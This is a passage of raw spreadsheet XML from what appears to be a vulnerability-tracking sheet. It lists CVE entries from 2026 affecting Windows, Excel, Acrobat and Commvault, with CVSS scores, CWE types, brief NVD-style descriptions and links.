          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77091</t>
        </is>
      </c>
      <c r="D626" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G626" s="5" t="inlineStr"/>
      <c r="H626" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I626" s="5" t="inlineStr"/>
      <c r="J626" s="5" t="inlineStr"/>
      <c r="K626" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L626" s="5" t="inlineStr"/>
      <c r="M626" s="5" t="inlineStr"/>
      <c r="N626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O626" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q626" s="5" t="inlineStr"/>
      <c r="R626" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S626" s="5" t="inlineStr">
        <is>
          <t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t>
        </is>
      </c>
      <c r="T626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="D627" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F627" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G627" s="5" t="inlineStr"/>
      <c r="H627" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I627" s="5" t="inlineStr"/>
      <c r="J627" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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27" s="5" t="inlineStr"/>
      <c r="M627" s="5" t="inlineStr"/>
      <c r="N627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O627" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q627" s="5" t="inlineStr"/>
      <c r="R627" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S627" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="D628" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F628" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G628" s="5" t="inlineStr"/>
      <c r="H628" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I628" s="5" t="inlineStr"/>
      <c r="J628" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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28" s="5" t="inlineStr"/>
      <c r="M628" s="5" t="inlineStr"/>
      <c r="N628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O628" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q628" s="5" t="inlineStr"/>
      <c r="R628" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="S628" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77503</t>
        </is>
      </c>
      <c r="D629" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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9" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q629" s="5" t="inlineStr"/>
      <c r="R629" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S629" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="D630" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F630" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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30" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q630" s="5" t="inlineStr"/>
      <c r="R630" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S630" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78447</t>
        </is>
      </c>
      <c r="D631" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F631" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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31" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q631" s="5" t="inlineStr"/>
      <c r="R631" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S631" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78448</t>
        </is>
      </c>
      <c r="D632" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F632" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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32" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q632" s="5" t="inlineStr"/>
      <c r="R632" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S632" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79907</t>
        </is>
      </c>
      <c r="D633" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F633" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L633" s="5" t="inlineStr"/>
      <c r="M633" s="5" t="inlineStr"/>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q633" s="5" t="inlineStr"/>
      <c r="R633" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S633" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79908</t>
        </is>
      </c>
      <c r="D634" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F634" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q634" s="5" t="inlineStr"/>
      <c r="R634" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S634" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79909</t>
        </is>
      </c>
      <c r="D635" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F635" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q635" s="5" t="inlineStr"/>
      <c r="R635" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S635" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80075</t>
        </is>
      </c>
      <c r="D636" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F636" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L636" s="5" t="inlineStr"/>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q636" s="5" t="inlineStr"/>
      <c r="R636" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S636" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80161</t>
        </is>
      </c>
      <c r="D637" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E637" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F637" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q637" s="5" t="inlineStr"/>
      <c r="R637" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S637"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T637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81353</t>
        </is>
      </c>
      <c r="D638" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E638" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F638" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q638" s="5" t="inlineStr"/>
      <c r="R638" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S638" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81386</t>
        </is>
      </c>
      <c r="D639" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E639" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F639" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q639" s="5" t="inlineStr"/>
      <c r="R639" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S639" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81388</t>
        </is>
      </c>
      <c r="D640" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F640" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q640" s="5" t="inlineStr"/>
      <c r="R640" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S640" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81396</t>
        </is>
      </c>
      <c r="D641" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E641" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F641" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q641" s="5" t="inlineStr"/>
      <c r="R641" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-193</t>
        </is>
      </c>
      <c r="S641" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81397</t>
        </is>
      </c>
      <c r="D642" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E642" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F642" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
